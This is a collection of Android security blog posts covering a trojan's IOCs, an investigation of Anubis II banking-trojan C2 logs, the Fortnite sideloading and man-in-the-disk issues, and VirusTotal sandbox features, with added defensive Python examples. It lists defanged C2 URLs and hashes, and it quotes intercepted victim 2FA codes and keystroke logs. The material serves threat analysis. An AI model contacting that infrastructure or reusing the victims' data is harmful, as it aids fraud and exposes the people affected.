This trojan shows a new path for threats to evolve. Having the ability to move code from desktops to mobile platforms with no effort, as the eCommon.dll demonstrates, means that malicious actors can create hybrid threats faster and with fewer resources involved than ever before. This trojan's design and implementation are of an uncommonly high level, making it a dangerous threat. These kinds of threats will become more common, as more and more companies decide to publish their software directly to consumers.

There have been several recent examples of companies choosing to release their software directly to consumers, bypassing traditional storefronts. The average user might not have the necessary skills to distinguish legitimate sites from malicious ones. We've seen that this has been the case for many years with spear-phishing campaigns on desktop and mobile platforms, so, unfortunately, it doesn't seem that this will change any time soon. And this just means attackers will continue to be successful.

Coverage

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of compromise (IOC)

URLs
hxxp://5.9.33.226:5416
hxxp://172.110.10.171:85/testcc.php
hxxp://sub1.tdsworker.ru:5555/3ds/

Hash values
Package.apk - A342a16082ea53d101f556b50532651cd3e3fdc7d9e0be3aa136680ad9c6a69f
eCommon.dll - 604deb75eedf439766896f05799752de268baf437bf89a7185540627ab4a4bd1
Reznov.dll - 17b8665cdbbb94482ca970a754d11d6e29c46af6390a2d8e8193d8d6a527dec3

Custom activity prefix
com.cact.CAct

Android Malware Intercepts SMS 2FA: We have the Logs!

A couple of years ago I was doing some phishing investigations training at the Police School in Santiago, Chile. One module in my training was called "Logs Don't Lie," which pointed out that in most cases we have everything we need to prioritize a phishing response just by looking at the log files, either on the compromised phishing server or in the Financial Institution's own logs.

Malware C2 servers are another great place to apply the rule "Logs Don't Lie."  Most security researchers realize that there is a great cloud of fellow researchers on Twitter sharing little tips and glimpses of their investigations.  @LukasStefanko and @nullcookies and I have been looking at a C2 server for a piece of Android malware.  And the Logs are AMAZINGLY helpful at understanding just what kind of damage such a trojan can do!    (Sidenote:  @nullcookies is a monster for finding fresh and interesting phish (and often related tools), while @LukasStefanko is an awesome malware analyst for ESET, specializing in Android-based malware.  You should follow both on Twitter if you care about such things.  Thanks to them both for the pointer that leads to what follows.)

In this case, the malware is believed to be called "Anubis II" and likely uses the "Builder" that is depicted in this YouTube video, titled "Builder Android Bot Anubis 2"

Launching the APK Builder "Android Botnet Anubis II"

The malware actor chooses from his list of banking targets

In the comments section of the video, someone has shared a screenshot of the botmaster's control panel. In this case it demonstrates that 619 Android phones can be controlled from the botnet:

Phones that can be controlled from the Anubis II control panel

In the particular instance referred to by Lukas and NullCookies, the malware seems to have been active primarily in June 2018. The server hosting the Anubis II panel has a list of banks that it can present.

The targets which have custom web inject (or phone inject) content include:
  • 7 Austrian banks
  • 18 Australian banks
  • 5 Canadian banks
  • 6 Czech banks
  • 11 German banks
  • 11 Spanish banks
  • 11 French banks
  • 8 Hong Kong banks
  • 11 Indian banks
  • 6 Japanese banks
  • 1 Kenyan bank
  • 4 New Zealand banks
  • 32 Polish banks
  • 4 Romanian banks
  • 9 Turkish banks
  • 10 UK banks (Bank of Scotland, Barclays, CSGCSDNMB, Halifax, HSBC, Natwest, Royal Bank of Scotland, Santander, TSB, Ulster)
  • 10 US banks (Bank of America, Capital One, Chase, Fifth Third, NetTeller, Skrill, SunTrust, USAA, US Bank, Wells Fargo Mobile)

Fake Android Login Pages for Banks 

While each of the 190 sites has a fake login page available, we thought we would show a sampling from banks around the world . . . 

There are also several Crypto Currency organizations listed:
  • blockchaine
  • coinbase
  • localbitcoin
  • unocoin
As well as some Online Payment, Email, and Social Media sites:
  • eBay
  • Facebook
  • Gmail
  • PayPal
  • ZebPay

Each bank on the list has the equivalent of a phishing page that can be presented if the owner of the android phone attempts to log in to the given bank.

Some of them have silly typographical errors that will hopefully reduce success, such as this Wells Fargo content, inviting the phone owner to "Sing In" to the bank. Perhaps there is a Wells Fargo Choir? Hopefully that will cause victims to NOT fall for this particular malware!

The Wells Fargo Choir? Sing On!

The SMS Intercepts

One of the main benefits of having access to the server was to see so many examples of successful SMS message intercepts!  At the time of the server dump, this one contained 32,900+ unique "keylog" entries and 52,000+ logged SMS messages from at least 47 unique devices.

Here's an example showing a bank two-factor authentication request being forwarded to the criminals:

Text: Bank of Redacted: 819881 is your authorization code which expires in 10 minutes. If you didn't request the code, call 1.800.xxx.xxxx for assistance.

Keylogging was also enabled, allowing the criminal to see when a bank app was being used:

06/14/2018, 09:07:34 EDT|(FOCUSED)|[From:, REDACTED BANK, Account Number:, ******6680, Date:, May 30, 2018 10:10:42 AM EDT, Status:, Canceled, Amount:, $100.00, Type:, Deposit, Transfer ID:, 25098675]

In this example, an online payment company is sharing a message:

06/29/2018, 15:28:46 EDT|(CLICKED)|[Friendly reminderThis is Mr. XXXXXXX from REDACTED. This is a friendly reminder that you have a payment due today by 6pm If you have any questions or need to make a payment  via phone call 804-999-9999 or we have a new payment processing system that allows , for your convenience, to simply text in the last 4 digits of a card you've previously used and the security code and we're able to process your payment.  Feel free to call  REDACTED with any questions at 804-xxx-xxxx]

Hundreds of Gmail verification codes were found in the logs:

06/14/2018, 00:19:33 EDT|(FOCUSED)|[G-473953 is your Google verification code., 1 min ago]

Quite a few Uber codes were also found in the logs:

Text: [#] 9299 is your Uber code. qlRnn4A1sbt

PayPal, QuickBooks, LinkedIn, Facebook, Stash, and Stripe all had 2FA codes make an appearance in the logs:

Text: FREE PayPal: Your security code is: 321842. Your code expires in 10 minutes. Please don't reply.

Text: [Your QuickBooks Self-Employed Code is 952708, 1 min ago]

Text: 383626 is your Facebook password reset code or reset your password here: https://fb.com/l/9wBUVuGxxxx5zC

Text: Your LinkedIn verification code is 967308.

Text: 103-667 is your Stripe verification code to use your payment info with Theresa.

Text: Your Stash verification code is 912037. Happy Stashing!

Text: Cash App: 157-578 is the sign in code you requested.

Text: Your verification code for GotHookup is: 7074

In a directory called "/numers/" there were also examples of address book dumps from phone contacts.  The small number of these seem to indicate this would be a "triggered" request, where the botnet operator would have to request the address book.  In the example we found, with seven area code (404) numbers, four (770) numbers and four (678) numbers, it is likely an Atlanta, Georgia based victim.

The keylogging feature also seems to be something that is turned on or off at the request of the botnet operators; there were far fewer devices for which keylogs were found.  Example keylog entries looked like this.

A telephone prompt looked like this:

  • 06/15/2018, 14:38:55 EDT|(CLICKED)|[Call management, •, 10m, 4 missed calls, Ashley Brown (3), Mom]
  • 06/15/2018, 14:38:59 EDT|(CLICKED)|[Call Ashley Big Cousin, Quick contact for Ashley Brown]
  • 06/15/2018, 14:39:01 EDT|(CLICKED)|[1 804-999-9999, Mobile, Call Ashley Brown]

Responding to a message looked like this:

  • 06/15/2018, 16:02:34 EDT|(CLICKED)|[Messaging, •, now, Expand button, (804) 999-9999 , Hey Terry can you send the address, REPLY]
  • 06/15/2018, 16:02:37 EDT|(FOCUSED)|[Aa]
  • 06/15/2018, 16:02:46 EDT|(CLICKED)|[Copy, Forward, Delete]
  • 06/15/2018, 16:02:50 EDT|(FOCUSED)|[]
  • 06/15/2018, 16:02:54 EDT|(CLICKED)|[Messaging]
  • 06/15/2018, 16:02:57 EDT|(CLICKED)|[Enter message]
  • 06/15/2018, 16:05:11 EDT|(CLICKED)|[Answer]
  • 06/15/2018, 16:05:29 EDT|(CLICKED)|[]
  • 06/15/2018, 16:10:50 EDT|(FOCUSED)|[]
  • 06/15/2018, 16:10:52 EDT|(CLICKED)|[Enter]
  • 06/15/2018, 16:11:01 EDT|(FOCUSED)|[2007 Their Address Ct  North CityTheyTyped OK 11111]
  • 06/15/2018, 16:11:03 EDT|(FOCUSED)|[]

A YouTube session looked like this:

  • 06/27/2018, 15:23:36 EDT|(CLICKED)|[YouTube]
  • 06/27/2018, 15:23:46 EDT|(CLICKED)|[Pause video]
  • 06/27/2018, 15:41:19 EDT|(FOCUSED)|[14:46, Go to channel, FINDING OUT THE GENDER!!!, Menu, The Rush Fam · 26K views4 hours ago, 6:12, Go to channel, TRY NOT TO CRY CHALLENGE REACTION WITH KID (SHE ACTUALLY CRIED), Menu, CJ SO COOL · 2.5M views · 1 year ago, SUBSCRIBED]
  • 06/27/2018, 15:46:38 EDT|(FOCUSED)|[]
  • 06/27/2018, 15:46:41 EDT|(CLICKED)|[Enter]
  • 06/27/2018, 15:46:53 EDT|(CLICKED)|[Play video]
  • 06/27/2018, 15:48:06 EDT|(CLICKED)|[ · 0:11]
  • 06/27/2018, 15:48:09 EDT|(CLICKED)|[ · 0:09]
  • 06/27/2018, 15:48:10 EDT|(CLICKED)|[ · 0:08]
  • 06/27/2018, 15:54:30 EDT|(CLICKED)|[Suggested: "BREAKING UP IN FRONT OF COMPANY!!" PRANK ON PANTON SQUAD!!!]
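To turn a dump like the ones above into something an incident responder can act on, here is an added example (code written for this page, not code from the original post or from the botnet) that covers both the 2FA-code excerpts and the keylog excerpts. It parses the two record shapes visible in them, the timestamped `|(EVENT)|[...]` accessibility entries and the bare `Text:` SMS captures, and pulls out the one-time codes together with the service they belong to. The sample lines are constructed, and the keyword list and code shapes are assumptions drawn only from the messages quoted above; extend both for other services.

```python
"""Triage helper for Anubis-style accessibility and SMS log dumps.

Added example, not code from the original post. It assumes the two record
shapes visible in the excerpts: "MM/DD/YYYY, HH:MM:SS TZ|(EVENT)|[payload]"
for accessibility events and "Text: payload" for captured SMS. The sample
records at the bottom are constructed; the codes in them are not real.
"""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, Iterable, List, Optional, Tuple

EVENT_RE = re.compile(
    r"^(?P<ts>\d{2}/\d{2}/\d{4}, \d{2}:\d{2}:\d{2}) [A-Z]{3,4}\|"
    r"\((?P<event>[A-Z]+)\)\|\[(?P<payload>.*)\]$"
)
TEXT_RE = re.compile(r"^Text:\s*(?P<payload>.*)$")

# Only payloads that talk about a code are considered; this keeps account
# balances, phone numbers and dates (all digit groups too) out of the results.
OTP_KEYWORDS = ("verification code", "security code", "sign in code",
                "reset code", "code is", "is your")

# Code shapes seen in the post: G-473953, 103-667, 321842, 9299. The
# lookarounds reject digit groups that are part of a phone number such as
# 804-999-9999.
CODE_RE = re.compile(r"(?<![\d-])(G-\d{6}|\d{3}-\d{3}|\d{4,6})(?![\d-])")

# Service attribution by whole-word match in the message body (assumed list).
SERVICES = {
    "google": "Google", "uber": "Uber", "paypal": "PayPal",
    "quickbooks": "QuickBooks", "facebook": "Facebook", "linkedin": "LinkedIn",
    "stripe": "Stripe", "stash": "Stash", "cash app": "Cash App",
}


@dataclass
class LeakedCode:
    service: str                  # attributed service, or "unknown"
    code: str
    event: str                    # FOCUSED/CLICKED for UI events, SMS for Text: lines
    timestamp: Optional[datetime]  # Text: records carry no timestamp


def _split_record(line: str) -> Optional[Tuple[Optional[datetime], str, str]]:
    """Return (timestamp, event, payload) for a recognised record, else None."""
    m = EVENT_RE.match(line.strip())
    if m:
        ts = datetime.strptime(m.group("ts"), "%m/%d/%Y, %H:%M:%S")
        return ts, m.group("event"), m.group("payload")
    m = TEXT_RE.match(line.strip())
    if m:
        return None, "SMS", m.group("payload")
    return None


def _attribute(payload: str) -> str:
    low = payload.lower()
    for key, name in SERVICES.items():
        if re.search(r"\b" + re.escape(key) + r"\b", low):
            return name
    return "unknown"


def extract_codes(lines: Iterable[str]) -> List[LeakedCode]:
    """Pull one-time codes out of captured UI events and SMS texts."""
    found: List[LeakedCode] = []
    for line in lines:
        rec = _split_record(line)
        if rec is None:
            continue
        ts, event, payload = rec
        if not any(k in payload.lower() for k in OTP_KEYWORDS):
            continue
        m = CODE_RE.search(payload)
        if m:
            found.append(LeakedCode(_attribute(payload), m.group(1), event, ts))
    return found


def summarize(codes: List[LeakedCode]) -> Dict[str, int]:
    """Count leaked codes per service, the list to hand to victim notification."""
    counts: Dict[str, int] = {}
    for c in codes:
        counts[c.service] = counts.get(c.service, 0) + 1
    return counts


# Constructed records in the shapes shown in the post (not real victim data).
SAMPLE_LOG = [
    "06/14/2018, 00:19:33 EDT|(FOCUSED)|[G-111111 is your Google verification code., 1 min ago]",
    "Text: [#] 2222 is your Uber code. xXxXxXxXxXx",
    "Text: FREE PayPal: Your security code is: 333333. Your code expires in 10 minutes. Please don't reply.",
    "Text: 444-555 is your Stripe verification code to use your payment info with Someone.",
    "Text: Cash App: 666-777 is the sign in code you requested.",
    "06/15/2018, 14:39:01 EDT|(CLICKED)|[1 804-999-9999, Mobile, Call Ashley Brown]",
    "06/29/2018, 15:28:46 EDT|(CLICKED)|[Friendly reminder: a payment is due today. Text the last 4 digits of your card and the security code to 804-999-9999.]",
    "Text: Your verification code for SomeApp is: 8888",
]

if __name__ == "__main__":
    for c in extract_codes(SAMPLE_LOG):
        print(c)
    print(summarize(extract_codes(SAMPLE_LOG)))
```

The per-service counts are what you would hand to the affected providers or to the victim-notification step. The point the logs make, and the reason the filter is keyword-gated rather than grabbing every six-digit number, is that the malware does not need to break SMS: anything the user can see in a notification or message body, an accessibility service can read too, which is the argument for push-based approval or hardware keys that put nothing readable on screen.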

Distribution

From looking for this malware in various collections, such as VirusTotal Intelligence, it seems that the malware is fairly common.  Many new versions of the malware show up in their collection every day.   The most common point of distribution seems to be the Google Play Store.

A stream of such apps was reported on by, well, just about everyone in July 2018.  Some of the headlines included:

Anubis Strikes Again: Mobile Malware continues to plague users in Official App Stores  - from IBM X-Force Research's Security Intelligence blog

Best graphic goes to Secure Computing Magazine:

https://www.scmagazine.com/


A more recent post, from AlienVault (20 days ago):  "Anubis Android Malware in the Play Store"

A search in VirusTotal Intelligence reveals 62 new filehashes ONLY FROM TODAY (September 10, 2018) that match a definition name of "Anubis".  Some of the more popular names for the trojan on VirusTotal include:

DrWeb:  Android.BankBot.1679
Ikarus: Trojan-Banker.AndroidOS.Anubis
Kaspersky: HEUR:Trojan-Dropper.AndroidOS.Hqwar.bb
Sophos: Andr/BankSpy-AH

Kaspersky authored a special article on this banking trojan, which they call "HQWar", back in April under the headline "Phantom menace: mobile banking trojan modifications reach all-time high: Mobile banking Trojans hit the list of cyber-headaches in Q2 2018".   In that article they said they had documented 61,000 versions!

Kaspersky: Phantom Menace

As I mentioned at the beginning of this blog (where I cited Lukas), ESET has produced an amazing number of articles on Android banking trojans lurking in the Google Play store.  Here are a few of them:

Intercepter-NG – Android App For Hacking

Intercepter-NG is a multi-functional network toolkit that includes an Android app for hacking; its main purpose is to recover interesting data from the network stream and perform different kinds of MiTM attacks.

This refers specifically to the Intercepter-NG Console Edition, which works on a range of systems including NT, Linux, BSD, MacOSX, iOS and Android.

The Windows version is the one with the most powerful feature-set, but the Android app is fairly handy too.

Read the rest of Intercepter-NG – Android App For Hacking now! Only available at Darknet.

Attention Fortnite Fans: The New Android App Was Found Containing a Massive Vulnerability

Back in June, Fortnite fans, hopeful for an Android version of the game, were teased with fake apps, which were in turn part of a cybercriminal’s scheme. Fast forward to present day, and their prayers have been answered, as a real Android version of the popular game has been released. However, a recently revealed flaw in the app is raining on their parade, as Google security researchers have revealed this week that the Fortnite Android app is vulnerable to man-in-the-disk (MitD) attacks.

For some context, a man-in-the-disk (MitD) attack is rooted in an app’s use of ‘External Storage,’ which is one of the two types of data storage supported by the Android OS. With this attack, a cybercriminal can watch a particular app’s External Storage space and tamper with the data stored there, since it is shared by all apps.

Now, you may be wondering how this works with the new Fortnite Android app vulnerability. This recently disclosed vulnerability allows malicious apps (that are already installed on a user’s phone) to hijack the Fortnite app’s installation process and download other malicious apps. This means a hacker could essentially install any nasty software they wanted onto a victim’s phone. And according to recent McAfee research, this is precisely what some parents fear when their children game online. In fact, 52% worry about cybercriminals hacking gaming accounts.
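What “tamper with the data stored there” means in practice, and the check that blunts it, as an added example (not code from the post and not Epic Games’ code): a temporary directory stands in for Android’s shared external storage, one function plays the app staging a download there, another plays a co-installed app with the storage permission overwriting it, and the verifying app accepts the file only if the bytes it actually read match a digest it learned out of band. The file name, payload bytes and digest are constructed for the demonstration.

```python
"""Why data staged in shared (external) storage must be verified before use.

Added example, not from the post and not Epic Games' code. A temporary
directory stands in for Android external storage, which every app holding
the storage permission can read and write. The expected digest would
normally come over the app's own authenticated channel (for instance a
download manifest fetched over TLS); here it is computed from the legitimate
bytes up front to keep the example offline.
"""
import hashlib
import hmac
import tempfile
from pathlib import Path
from typing import Dict, Optional


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def load_verified(path: Path, expected_sha256: str) -> Optional[bytes]:
    """Read a staged file once and return its bytes only if they match.

    The caller must use the returned bytes and never re-open the path: in a
    shared directory another app can swap the file between a check and a
    second read (a time-of-check/time-of-use window).
    """
    data = path.read_bytes()
    if hmac.compare_digest(sha256_hex(data), expected_sha256):
        return data
    return None


def stage_download(shared_dir: Path, name: str, payload: bytes) -> Path:
    """Simulate the app writing a downloaded package into shared storage."""
    target = shared_dir / name
    target.write_bytes(payload)
    return target


def tamper(shared_dir: Path, name: str, payload: bytes) -> None:
    """Simulate another app with storage access overwriting the staged file."""
    (shared_dir / name).write_bytes(payload)


def demo() -> Dict[str, bool]:
    """Run the scenario end to end and report what the verifying app sees."""
    # Constructed stand-ins for package bytes; not real APK contents.
    legit = b"PK\x03\x04 constructed-stand-in-for-the-real-package"
    evil = b"PK\x03\x04 constructed-stand-in-for-a-swapped-in-package"
    expected = sha256_hex(legit)  # learned out of band, never read from the disk
    with tempfile.TemporaryDirectory() as d:
        shared = Path(d)
        staged = stage_download(shared, "update.apk", legit)
        before = load_verified(staged, expected)   # accepted
        tamper(shared, "update.apk", evil)
        after = load_verified(staged, expected)    # rejected
    return {
        "accepted_before_tamper": before == legit,
        "accepted_after_tamper": after is not None,
        "tampered_bytes_used": after == evil,
    }


if __name__ == "__main__":
    print(demo())
```

Two details carry the weight here: the digest has to come from somewhere the other app cannot write (the app’s own TLS-fetched manifest, not a checksum file sitting next to the download), and the bytes that were verified are the bytes that get used, because re-opening the path after the check hands the attacker a window to swap the file. Keeping the download in app-private internal storage removes the shared-directory problem altogether; this check is the fallback for when shared storage cannot be avoided.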

Fortunately, Epic Games is already on the case. The major video game company has already released version 2.1.0 of this application, which patches this vulnerability. However, Fortnite users must still take a few important security steps of their own in order to protect themselves from this attack. If you’re a Fortnite gamer, be sure to follow these tips:

  • Update, update, update. No matter the application, it can’t be stressed enough how important it is to always update your app as soon as an update is available. Patches (like the one released by Epic Games) are typically included with every update.
  • Clean house. Given this hack relies on preexisting malicious apps on a victim’s phone, do your due diligence and clean up the applications on your device. This means deleting any old apps you don’t use, or ones that you may have downloaded from outside an official app store. If you’re unsure whether an application is secure or not, do some research – conduct a quick Google search or scan through the app’s review section on an app store and see if it has had any issues with security.
  • Use a mobile security solution. As app vulnerabilities such as this one continue to impact mobile users, make sure your devices are prepared for any threat coming their way. To do just that, cover these devices with a mobile security solution, such as McAfee Mobile Security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Attention Fortnite Fans: The New Android App Was Found Containing a Massive Vulnerability appeared first on McAfee Blogs.

Fortnite: When Dollars and Cents Trumps Security!

When Epic Games recently announced and subsequently released Fortnite for Android, it took the decision to bypass the Play Store and ask users to side-load the app. After I read that Epic Games’ brilliant idea was to ask Android users to essentially downgrade the security on their devices, there was a lot of head-on-desk action.

Side-loading an app onto an Android device is essentially asking the user to download it from a website instead of the Play Store and then ignore the Android warnings about installing apps from untrusted locations. In more recent Android versions this safety net is called “Install unknown apps” and when a user tries to install an app directly from a website, the operating system will ask them a few times if they really want to do this. Note that this does not affect users on Apple iOS devices as Apple locks down app distribution to the App Store.

Don’t get me wrong, I understand both the business reason and the developer logic that drove Epic Games to release the Android version in this way. For developers, Android’s lack of homogeneity means they often have to validate their app across multiple stores, each with its own constraints and minimum requirements. Thus, what should be a simple app release can gain an Nth degree of complexity; increased time to develop and associated maintenance, leading to increased cost. This is not an attractive prospect for any vendor wanting to deliver a product. Added to the fact that the Play Store takes a 30% cut on all transactions, you can see why an app vendor would look to avoid this if they could! Let’s face it, gaming companies have to make money in order to recoup the investment in the development and maintenance of the game.

You may be reading this wondering why incentivising users to side-load popular games is really a problem. Fundamentally, it introduces bad habits to users. These bad habits break down the general foundations of mobile device security. The Fortnite game has a huge following and we can’t neglect the message being sent not only to users but also other app developers.

In InfoSec, we constantly argue the benefits of teaching users about safe and secure principles when using electronic devices, browsing the web and installing applications. The Epic Games Android installation is the antithesis of these teachings, instead sending a clear message to users – especially a younger generation that will one day enter the workforce – that it is ok to install apps from any location.

The fact is, Epic Games is inadvertently making it easier for a malicious party to trick users into downloading fake apps and providing an opportunity for these malicious parties to introduce fake apps in the official store. This has been seen before, especially in the banking industry, and was even the case for Fortnite itself during the beta period. Google Play Protect is one element of sanity in this situation as it will scan the apps on the device. Unfortunately this is only a recent addition to Android and is not always available depending on the version or the manufacturer of the device.

The issues continue even after the app is installed and being used. Fortnite, like many games, is free to play but relies extensively on in-app purchases – the pay to win paradigm. By not using the Play Store to deliver the app originally, the vendor needs to set up its own payment infrastructure and ensure it is safe. This in itself is not an easy task and can be fraught with errors and potential for data loss.

Stepping back and analysing the situation, where does one place blame? I think a majority of us in the industry, myself included, will scorn the vendor for not doing the right thing and promoting bad habits to users. Looking beyond the initial rapid shame response from the industry, I think it is interesting to put oneself in the vendor’s shoes. I can see how the lack of standardisation, draconian process and exorbitant fees would make it unattractive to go to market via the various app stores in the “proper way”. Perhaps it is time for companies like Apple and Google to rethink the app distribution model, so all can benefit from a secure platform?

Realistically, I believe that this situation just boils down to the ability for a business to make a profit and you know what, this isn’t the first time or place where security has been compromised or downgraded because of money. Let’s face it, we see it all the time – most recently in IoT security and more generally in corporate security when a security risk is accepted instead of investing time and funds in fixing it.

This is why we can’t have secure things!

Update: Seems like fake Fortnite apps are already in the wild, more here

Thanks to Hannah Finch for the editorial review

The post Fortnite: When Dollars and Cents Trumps Security! appeared first on Liquidmatrix Security Digest.

Multisandbox project welcomes Cyber adAPT ApkRecon

Two weeks ago we announced the release of our new VirusTotal Droidy Android sandbox, a virtual environment that executes Android applications in an automated fashion in order to capture all the actions that the given app performs on the operating system.

Today we are excited to announce that Cyber adAPT is becoming a multisandbox project partner and will be contributing data from its ApkRecon product to the fight against malware. Like Droidy, its solution also focuses on the Android environment. In their own words:

ApkRecon is a sandbox environment developed by the research team at Cyber adAPT.  Amongst many features, the sandbox boasts a baited Android environment, a decrypted network application level capture, and an attack payload triggering system to gain insight into the true intent of each piece of analyzed malware. ApkRecon is also used to generate detection logic for Cyber adAPT’s Mobile Threat Detection product to keep users safe all around the world.

These are some example reports displaying the data contributed by Cyber adAPT:


It is worth highlighting the usefulness of this kind of data. When facing unknown files for which you have no context, it provides rich contextual information that lets analysts form an initial judgement of the file before diving into dissecting it. For example, looking at the last example report above, we notice that the file performs an HTTP POST to:

hxxp://85.206.166.7/index.php?action=command

This is a URL that we can look up in VirusTotal Graph and jump to the host referenced in the URL, i.e. 85.206.166.7. When exploring this host we notice that only the file under consideration has communicated with it; however, we do notice that expansions are available according to the referrer files relationship. This relationship pinpoints files that contain the given host within their body, even if they have not been seen communicating with it. Let’s follow this notion; something shady seems to be going on:


Badness is much easier to spot when studying the sample characterised in this other report:

In this case the APK reaches out to the URL:

hxxp://zzwx.ru/apkfff?keyword=BBM

From there we can jump to the domain entity, i.e. zzwx.ru, and expand URLs observed under such domain, as well as files communicating with it. Just two hops and we already have a preliminary idea about the initial APK that reached out to the aforementioned URL being malicious:


These examples highlight the importance of extracting as many attributes and behavioral details as possible from files, not only because they allow us to better understand a particular threat, but because they connect the dots and reveal entire campaigns. For instance, very often blocking a given network location will render ineffective all malware variants of a given campaign (inability to reach the mothership server), so even when certain variants fly under detection radars, there is still hope that network security measures will stop a given attack.
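The two pivots above (URL to host 85.206.166.7 and its referrer files, URL to domain zzwx.ru and its URLs and communicating files) as an added example that is not VirusTotal’s code and does not call its API: a small hand-built relationship graph holding the post’s two indicators plus placeholder file hashes and a placeholder sibling URL, and a bounded breadth-first expansion that records which relationship each entity was reached through. That lets the “referrer-only” files (embedding the host, never seen talking to it) be separated from files actually observed communicating, and collects the network entities as the candidate list for the blocking the paragraph above describes.

```python
"""Bounded pivoting over typed relationships, in the style of the VirusTotal
Graph walk described in the post.

Added example, not VirusTotal's code and not a call to its API. The graph is
constructed by hand: it links the two indicators quoted in the post to
placeholder file hashes and a placeholder sibling URL, none of which are real
observations.
"""
from collections import deque
from typing import Dict, List, Set, Tuple

# entity -> [(relationship, related entity)]. Relationship names follow the
# post: communicating_files (seen talking to the host), referrer_files
# (contain the host in their body, never seen talking to it), urls (URLs
# observed under a domain) and host (the host part of a URL).
Graph = Dict[str, List[Tuple[str, str]]]

SAMPLE_GRAPH: Graph = {
    "hxxp://85.206.166.7/index.php?action=command": [("host", "85.206.166.7")],
    "85.206.166.7": [
        ("communicating_files", "sha256:AAAA-placeholder-analysed-apk"),
        ("referrer_files", "sha256:BBBB-placeholder"),
        ("referrer_files", "sha256:CCCC-placeholder"),
    ],
    "hxxp://zzwx.ru/apkfff?keyword=BBM": [("host", "zzwx.ru")],
    "zzwx.ru": [
        ("urls", "hxxp://zzwx.ru/apkfff?keyword=BBM"),
        ("urls", "hxxp://zzwx.ru/placeholder-sibling-url"),
        ("communicating_files", "sha256:DDDD-placeholder"),
        ("communicating_files", "sha256:EEEE-placeholder"),
    ],
    # A back edge, to show that the walk does not loop.
    "sha256:EEEE-placeholder": [("contacted_domains", "zzwx.ru")],
}

# entity -> (hops from the seed, relationships walked to reach it)
Expansion = Dict[str, Tuple[int, List[str]]]


def expand(graph: Graph, seed: str, max_hops: int = 2) -> Expansion:
    """Breadth-first walk at most max_hops relationships away from seed.

    The path is recorded per entity (first discovery wins), so the analyst
    sees not just what is connected but how it became connected.
    """
    seen: Expansion = {seed: (0, [])}
    queue = deque([seed])
    while queue:
        cur = queue.popleft()
        hops, path = seen[cur]
        if hops >= max_hops:
            continue
        for rel, nxt in graph.get(cur, []):
            if nxt not in seen:
                seen[nxt] = (hops + 1, path + [rel])
                queue.append(nxt)
    return seen


def files_reached(expansion: Expansion) -> Set[str]:
    return {e for e in expansion if e.startswith("sha256:")}


def referrer_only_files(expansion: Expansion) -> Set[str]:
    """Files pulled in only because they embed the host: the post's point that
    these deserve a look even though they were never seen communicating."""
    return {e for e, (_, path) in expansion.items()
            if e.startswith("sha256:") and path and path[-1] == "referrer_files"}


def network_indicators(expansion: Expansion) -> Set[str]:
    """Non-file entities in the expansion: candidates for network blocking,
    which the post notes can neutralise every variant of a campaign at once."""
    return {e for e in expansion if not e.startswith("sha256:")}


if __name__ == "__main__":
    for seed in [s for s in SAMPLE_GRAPH if s.startswith("hxxp://")]:
        exp = expand(SAMPLE_GRAPH, seed)
        print(seed)
        print("  files:", sorted(files_reached(exp)))
        print("  referrer-only:", sorted(referrer_only_files(exp)))
        print("  block candidates:", sorted(network_indicators(exp)))
```

The hop bound is the important knob: every relationship type is a fan-out, and an unbounded walk from a busy host or a shared hosting IP will drag in unrelated files within a few hops. Two hops, as in the post, is usually enough to decide whether the seed is worth the deeper look, and the recorded path tells you whether a file turned up because it talked to the infrastructure or merely mentions it.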

This kind of approach to blocking badness is something that we have shaped into a particular paper hosted in our www.virustotal.com/learn space, more specifically the paper entitled VirusTotal Intelligence for banking trojans. In this paper malicious network infrastructure is shut down by contacting the pertinent domain registrars and hosting providers; however, organizations can also blacklist these locations in their network security controls.

Meet VirusTotal Droidy, our new Android sandbox

Recently we called out "Additional crispinness on the MacOS box of apples sandbox". Continuing with our effort to improve our malware behavior analysis infrastructure, we are happy to announce the deployment of a new Android sandbox that replaces the existing system, which was developed back in 2013.

This setup characterises the actions that Android APKs perform when installed and opened; it has been baptised as “VirusTotal Droidy”. Droidy has been integrated in the context of the multisandbox project and extracts juicy details such as:
  • Network communications and SMS-related activity.
  • Java reflection calls.
  • Filesystem interactions.
  • SQLite database usage.
  • Services started, stopped, etc.
  • Permissions checked.
  • Registered receivers.
  • Crypto-related activity.
  • Etc.

You may find below a couple of reports showcasing this new functionality. Just select the “VirusTotal Droidy” entry in the multisandbox report selector (whenever there are multiple reports):

Don’t forget to also check the detailed report:


This advanced view allows you to dig into the hooked calls and take a look at the screenshots generated when running the apps:


The multisandbox project is in good shape, and now many samples have reports for multiple sandboxes. For instance, the following report allows you to see the output of Tencent HABO and VirusTotal Droidy:

As you can see, they are pretty complementary, proving the value of having different sandboxing technologies studying the same files.

To understand the extent to which this is an improvement with respect to the 2013 setup, you can take a look at the following report. It displays by default the output of the old sandbox. Use the selector to see the new report with VirusTotal Droidy:

Now, these may seem like minimal features to improve VirusTotal’s “microscope” capabilities for better understanding a particular threat. In fact, the changes go much deeper. All of our sandboxing information nurtures other services such as VirusTotal Intelligence and VirusTotal Graph. The richer the information that we generate for individual data set items, the greater the telescopic capabilities of VirusTotal. This is how we manage to fill in the dots and quickly see all activity tied to certain resources that often show up in malware investigations. For example, let us look at the graph of one of the domains seen in the previous reports:


At a glance you can understand that something shady is going on with wonderf00l.gq and you are able to discover other malicious domains such as flashinglight.tk, checkingupd.tk, flashupdservice.cf, etc. Some of these, for instance checkolimpupd.tk, are not only used as C2 infrastructure for malware but also serve as malware distribution points.

